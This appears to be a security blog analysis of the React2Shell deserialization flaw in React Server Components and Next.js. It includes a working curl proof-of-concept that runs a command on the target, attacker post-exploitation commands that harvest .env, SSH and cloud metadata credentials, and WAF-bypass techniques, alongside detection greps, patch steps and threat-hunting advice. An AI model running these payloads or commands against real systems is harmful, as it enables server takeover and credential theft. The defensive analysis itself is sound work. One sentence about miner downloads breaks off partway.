Listen to this Post

Introduction:
CVE-2025-55182, dubbed “React2Shell,” is a critical remote code execution flaw in React Server Components with a maximum CVSS score of 10.0. Exploited in the wild by China-nexus actors within hours of disclosure, it allows unauthenticated attackers to execute arbitrary code on servers running vulnerable versions of React, Next.js, and related frameworks. This analysis dissects the exploit chain, the rapid weaponization by threat groups like Earth Lamia, and provides actionable detection and hardening steps.
Learning Objectives:
- Understand the four-stage exploitation chain of the React2Shell vulnerability and how it bypasses deserialization safeguards.
- Identify the tools, techniques, and procedures (TTPs) used by threat actors like Earth Lamia in post-exploitation, from credential harvesting to backdoor deployment.
- Implement effective mitigation, detection, and patching strategies to defend against current and future exploitation attempts.
You Should Know:
- The Anatomy of the Exploit: From Deserialization to RCE
The core vulnerability is an unsafe deserialization flaw in React’s Flight protocol. The exploit works by crafting a malicious payload that tricks the server into executing attacker-controlled code during the data reconstruction phase.
Step-by-step guide explaining what this does and how to use it.
The attack chain involves four precise stages:
- Create a Self-Reference Loop: The payload uses the `$@` prefix to create circular references between chunks. For example, chunk `”1″: “$@0″` forces the parser to return the raw object of chunk 0, establishing a loop that exposes internal JavaScript prototypes.
- Hijack the Promise Resolution: The attacker sets a `then` property pointing to
__proto__:then. This makes the malicious chunk appear as a “Thenable” (Promise-like) to JavaScript, triggering React’s internal `initializeModelChunk` function automatically. - Inject Malicious Code String: The payload’s `_prefix` field contains the Node.js code to execute (e.g.,
require('child_process').execSync('id')). The `_formData.get` property is manipulated to point to the JavaScript `Function` constructor. - Trigger Code Execution via Blob Handler: A nested `$B` (Blob) reference within the payload’s `value` field is resolved. React’s handler for `$B` calls the compromised `_formData.get` method, which now evaluates the string in `_prefix` as a function, leading to remote code execution.
A minimal proof-of-concept (PoC) HTTP request looks like this:
curl -X POST http://<TARGET_URL>/ -H "Next-Action: anyvalue" \
-F '0={"status":"resolved_model","reason":-1,"_response":{"_prefix":"require(\"child_process\").execSync(\"id\")//", "_formData":{"get":"$1:constructor:constructor"}},"then":"$1:then","value":"{\"then\":\"$B\"}"}' \
-F '1="$@0"'
This command sends a multipart form request. The `Next-Action` header triggers the vulnerable path in Next.js, and the crafted chunks in parts `0` and `1` execute the `id` command on the server.
2. The Attacker’s Playbook: Post-Exploitation in the Wild
Threat actors, including the China-nexus group Earth Lamia, weaponized public PoCs within hours. Their post-exploitation activities follow a methodical pattern focused on credential theft, persistence, and monetization.
Step-by-step guide explaining what this does and how to use it.
Analysis of in-the-wild campaigns reveals a common sequence of actions post-compromise:
1. Initial Reconnaissance: Immediately after gaining a shell, attackers run basic commands to understand the environment.
whoami hostname cat /etc/passwd env
These commands identify the user context, system details, and harvest environment variables often containing secrets (e.g., DB_PASSWORD, AWS_ACCESS_KEY_ID).
2. Aggressive Credential Harvesting: Attackers execute scripts to scrape the filesystem for valuable data.
Example of a common payload searching for credentials
find /home /root /var/www -type f ( -name ".env" -o -name ".aws" -o -name ".ssh/" -o -name ".json" ) -exec cat {} \;
They also target cloud metadata services to steal IAM roles: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/`./tmp`.
3. Deploying Persistence Mechanisms: To maintain access, actors deploy backdoors.
Cryptominers: They download and execute Monero (XMRig) miners from
Sophisticated Backdoors: Groups like Earth Lamia deploy custom loaders and backdoors like PULSEPACK or frameworks like Sliver and Cobalt Strike. A typical loader might use DLL sideloading with a legitimate binary like `AppLaunch.exe` to execute encrypted shellcode in memory, evading signature-based detection.
3. Detecting an Active Exploit on Your Systems
Early detection is critical. Security teams should monitor logs for specific anomalies related to both exploitation attempts and post-exploitation behavior.
Step-by-step guide explaining what this does and how to use it.
1. Scan Application Logs for Exploitation Attempts: Look for HTTP POST requests containing the tell-tale signs of a React2Shell payload.
Key Header: `Next-Action` or `rsc-action-id` in requests.
Key Payload Patterns: Strings like "status":"resolved_model", `$@` references, or `$B` within request bodies. Use `grep` on web server logs:
grep -E "(Next-Action|rsc-action-id)" /var/log/nginx/access.log | grep -E "(\$@|\$B|resolved_model)"
2. Monitor Hosts for Post-Exploitation Indicators: Use endpoint detection (EDR) or process monitoring to flag suspicious child processes of Node.js.
Unexpected Command Execution: Alert on commands like whoami, id, curl, wget, or `bash` spawned from Node.js/Next.js processes.
Suspicious File Activity: Monitor for file writes in `/tmp` (e.g., /tmp/pwned.txt, /tmp/bot) or creation of unfamiliar binaries in world-writable directories.
3. Leverage Threat Intelligence Feeds: Block or alert on traffic from known malicious IPs associated with React2Shell campaigns. Initial indicators from AWS include IPs like `206[.]237.3.150` (Earth Lamia) and `45[.]77.33.136` (Jackpot Panda).
4. Patching and Immediate Mitigation Steps
Patching is the only complete remediation. Due to embedded dependencies, simply updating the React package may not be sufficient for some frameworks like Next.js.
Step-by-step guide explaining what this does and how to use it.
1. Identify All Vulnerable Applications: First, inventory your systems.
For Node.js projects, check `package.json` and `package-lock.json` files.
Use the `npm audit` command, which will flag the vulnerability.
For containerized environments, scan images for vulnerable packages using tools like Grype or Trivy.
2. Apply the Correct Patch: Update to the patched versions. The fix differs by framework.
Next.js (Most Critical): Upgrade to the latest patched version in your release line. For example:
For Next.js 15.x npm install [email protected] For Next.js 16.x npm install [email protected]
Important: Next.js embeds the vulnerable `react-server-dom-webpack` code directly. You must update the Next.js package itself, not just React.
React (for custom implementations): Update the server component packages.
npm install [email protected]
Other Frameworks (Waku, Vite RSC Plugin): Similarly update to their latest versions and ensure transitive dependencies are patched.
3. Implement Temporary Network-Level Protections (If Patching is Delayed):
AWS WAF Rule: Deploy the managed rule `AWSManagedRulesKnownBadInputsRuleSet` (version 1.24+).
Custom WAF Rule: Block or rate-limit HTTP POST requests containing the `Next-Action` header with unusually large body sizes or patterns like `$@` and $B. Note: Multiple WAF bypass techniques exist, so this is not a substitute for patching.
5. Advanced Threat Hunting: Finding Stealthy Compromises
If you ran a vulnerable version during the active exploitation window (starting December 3-4, 2025), assume compromise and hunt for evidence.
Step-by-step guide explaining what this does and how to use it.
1. Query for Unusual Network Connections from App Servers: Look for outbound connections from your application servers to unfamiliar external IPs or domains, especially on non-standard ports.
Linux command: Review netstat or ss output from the application server.
ss -tunap | grep node
Cloud/SIEM Query: In your security analytics platform, search for outbound connections from your app server’s IP to external IPs not in your allow list, particularly after an exploitation attempt was logged.
2. Hunt for New Persistence: Attackers often create scheduled tasks or services.
Linux: Check cron jobs for the application user and root.
crontab -l -u $(whoami) ls -la /etc/cron.d/
Container Environments: In Kubernetes, check for newly created pods, jobs, or cronjobs that may have been deployed via compromised credentials.
3. Scan for Dropped Malware Artifacts: Use antivirus or custom YARA rules to scan for known malware hashes associated with React2Shell campaigns, such as Sliver payloads or XMRig binaries.
- The Evolving Threat: WAF Bypass Techniques and Defense
Attackers continuously refine payloads to evade Web Application Firewalls. Understanding these techniques is key to tuning defenses.
Step-by-step guide explaining what this does and how to use it.
Researchers have documented several effective WAF bypass methods for React2Shell:
1. UTF-16LE Charset Smuggling: The attacker encodes the malicious property path (e.g., constructor) in UTF-16 Little Endian within a multipart form field. The WAF sees garbled bytes, but the Node.js server correctly decodes it.
Detection/Blocking: Configure your WAF to normalize or inspect common alternative character encodings like UTF-16. Block multipart parts declaring non-UTF-8 charsets if not required by your app.
2. Oversize Payload Attack: Attackers pad the beginning of the request body with tens of kilobytes of junk data (e.g., spaces). The malicious payload is placed after the WAF’s inspection limit (often 8KB).
Detection/Blocking: Implement a reasonable upper size limit for requests to `Next-Action` endpoints. Log and inspect requests that are significantly larger than typical for your application.
3. Fragmentation/Chunked Transfer: Splitting the exploit string across multiple packets to avoid signature matching.
Defense: Ensure your WAF or intrusion prevention system (IPS) can perform stream reassembly before inspection.
What Undercode Say:
- The Vulnerability Window is Now Microscopic: The React2Shell timeline proves that the gap between public PoC release and sophisticated nation-state exploitation has collapsed to mere hours. Defensive strategies must assume this speed and automate patching and threat detection.
- WAFs Are a Speed Bump, Not a Roadblock: While WAFs provide a critical layer of defense, the rapid development of encoding and obfuscation bypasses for this vulnerability shows they cannot be relied upon as a primary control. Patching and robust host/application-level monitoring are non-negotiable.
Prediction:
The React2Shell exploitation wave will have a lasting impact on software supply chain security. We anticipate increased scrutiny of serialization protocols in other meta-frameworks and a surge in “logic bug” hunting within complex JavaScript toolchains. Furthermore, the demonstrated efficiency of China-nexus groups in operationalizing public research will likely lead to more targeted, simultaneous exploitation campaigns against multiple high-profile N-day vulnerabilities, aiming to maximize access before defenders can globally coordinate a response. This event will accelerate the adoption of stricter software bill of materials (SBOM) policies and real-time runtime protection for application workloads.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Reybencortes Here – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


